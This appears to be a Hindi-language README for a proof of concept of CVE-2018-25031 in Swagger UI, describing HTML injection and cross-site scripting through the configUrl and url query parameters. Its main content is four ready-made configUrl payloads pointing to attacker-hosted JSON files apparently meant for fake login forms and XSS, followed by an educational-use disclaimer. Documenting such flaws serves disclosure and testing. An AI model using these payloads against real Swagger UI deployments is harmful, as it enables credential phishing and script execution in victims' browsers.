
Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS].
Swagger UI एक व्यापक रूप से उपयोग की जाने वाली लाइब्रेरी है जो OpenAPI (पूर्व में Swagger) विनिर्देशों को एक इंटरैक्टिव वेब इंटरफ़ेस में प्रस्तुत करती है। यह डेवलपर्स और इंटीग्रेटर्स को बैकएंड कार्यान्वयन के बिना API का अन्वेषण और परीक्षण करने में सक्षम बनाती है।
यह भेद्यता Swagger UI क्लाइंट द्वारा रिमोट कॉन्फ़िगरेशन या स्पेसिफिकेशन फ़ाइलों को लोड करने के लिए उपयोग किए जाने वाले URL क्वेरी पैरामीटर के अपर्याप्त सत्यापन से उत्पन्न होती है। सामान्य पैरामीटर में शामिल हैं:
?url=.yaml?configUrl=.jsonकोई हमलावर इन पैरामीटरों को एक हमलावर-नियंत्रित OpenAPI परिभाषा या रिमोट रूप से होस्ट की गई कॉन्फ़िगरेशन फ़ाइल की ओर इंगित कर सकता है, जिसे किसी संवेदनशील इंस्टेंस द्वारा प्रस्तुत किया जा सकता है।
एक दुर्भावनापूर्ण रिमोट फ़ाइल लोड करने से होस्टिंग कॉन्फ़िगरेशन और मौजूद सुरक्षा उपायों के आधार पर कई उच्च-प्रभाव वाले परिदृश्य सक्षम हो सकते हैं:
संदर्भ:
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/login.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/remote-login.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/img.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/xss.json
इस रिपॉजिटरी की सामग्री केवल शैक्षिक और सूचनात्मक उद्देश्यों के लिए प्रदान की गई है। लेखक किसी भी दुरुपयोग के लिए उत्तरदायी नहीं है। उपयोग से पहले उचित प्राधिकरण सुनिश्चित करें, अपने जोखिम पर जिम्मेदारी से कार्य करें, और सभी कानूनी और नैतिक दिशानिर्देशों का पालन करें।